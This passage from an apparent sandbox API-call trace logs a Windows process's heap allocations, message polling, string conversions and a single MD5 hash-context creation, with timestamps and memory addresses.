wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0253.417] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0253.417] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0253.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0253.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.418] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0253.418] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0253.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0253.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0253.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0253.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0253.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0253.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0253.421] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0253.421] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0253.421] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0253.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.421] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0253.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0253.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54df8 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0253.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0253.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0253.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0253.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0253.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0253.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.423] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0253.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0253.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ee8 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0253.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0253.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0253.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0253.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0253.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0253.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0253.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d28 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0253.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0253.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0253.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0253.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54df8 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: 